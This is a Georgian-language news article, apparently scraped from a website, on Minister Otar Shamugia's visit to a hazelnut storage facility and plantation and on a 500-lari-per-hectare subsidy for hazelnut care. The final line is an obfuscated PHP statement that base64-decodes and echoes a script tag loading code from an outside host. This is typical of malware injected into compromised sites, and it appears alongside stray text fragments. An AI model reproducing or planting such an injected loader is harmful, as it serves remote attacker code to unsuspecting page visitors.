celsiusi
ავერსი შნაიდერი

 გარემოს დაცვისა და სოფლის მეურნეობის მინისტრი ოთარ შამუგია ლანჩხუთის მუნიციპალიტეტის სოფელ ქვემო აკეთში მოქმედ თანამედროვე სტანდარტებით აღჭურვილ თხილის შემნახველ საწარმოში იმყოფებოდა, სადაც ერთდროულად 1 000 ტონამდე თხილის შენახვაა შესაძლებელი. კომპანია სოფლის განვითარების სააგენტოს „სასოფლო-სამეურნეო პროდუქციის გადამმუშავებელი და შემნახველი საწარმოების თანადაფინანსების“ პროექტის ბენეფიციარია.

გარემოს დაცვისა და სოფლის მეურნეობის მინისტრი ჩოხატაურის მუნიციპალიტეტის სოფელ გუთურში, ფერმერის ლევან კაპანაძის პლანტაციაში თხილის კრეფის პროცესსაც დაესწრო.

„ჩვენ ვიმყოფებოდით საშრობში, სადაც ვნახეთ პროცესი, როგორ აბარებენ ფერმერები თხილს, ზოგი აშრობს, ზოგი ყიდის ადგილზე. გავესაუბრეთ ასევე ფერმერებს. ახლა ვიმყოფებით ერთ-ერთ ბაღში და აქაც გვქონდა ფერმერებთან საუბარი. ჩვენი პირველი კითხვა არის ის, რომ ფერმერებისგან მივიღოთ მაქსიმალურად ინფორმაცია, თუ როგორი მოსავალი აქვთ, როგორია ხარისხი თხილის, ასევე როგორ იმუშავა იმ პროგრამამ, რომელიც განვახორციელეთ შარშან. თქვენ იცით, რომ თხილის მოსავალი საკმაოდ დაბალი იყო, ხარისხიც არ იყო დამაკმაყოფილებელი. აქედან გამომდინარე, ჩვენ ერთობლივად, სექტორთან ერთად ვიმსჯელეთ და მივიღეთ გადაწყვეტილება, რომ მიზნობრივად სწორედ თხილის მოვლის საშუალებებით დავხმარებოდით და ერთ ჰექტარზე 500 ლარის ოდენობით დახმარება გავუწიეთ ფერმერებს, ვისაც არაუმეტეს სამ ჰექტრამდე ოდენობით ბაღი აქვთ.

ჩვენ ვხედავთ და მოვისმინეთ თავად ფერმერებისგან, ვინც, ასე ვთქვათ, გამოიყენა, უფრო ხარისხიანი, ეს იყო გასულ წელს. ჩვენ ხშირად გვესმის ხოლმე, რომ აზრი არ აქვს მოვლას და ა.შ. ეს, რა თქმა უნდა, არის არასწორი. სწორედ იმიტომ გავაკეთეთ ეს პროგრამა, მიზნობრივი პროგრამა, რომ ის საშუალებები, რაც წამლობისთვის არის საჭირო, მათ ჰქონოდათ. კიდევ ერთხელ ვიტყვი, რომ ფაქტობრივად, 500 ლარის ოდენობით მხარდაჭერა ნიშნავს, რომ ერთ ჰექტარზე 500 ლარი სრულად საკმარისია 4-ჯერ 5-ჯერ წამლობის ჩასატარებლად. ეს მნიშვნელოვანი მხარდაჭერა იყო და ვფიქრობ, რომ წელსაც და მომავალშიც თუ ფერმერები უფრო მეტად იზრუნებენ თხილის მოვლაზე, გვექნება უკეთესი და უკეთესი მოსავალი“,- განაცხადა გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა ოთარ შამუგიამ.

634
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");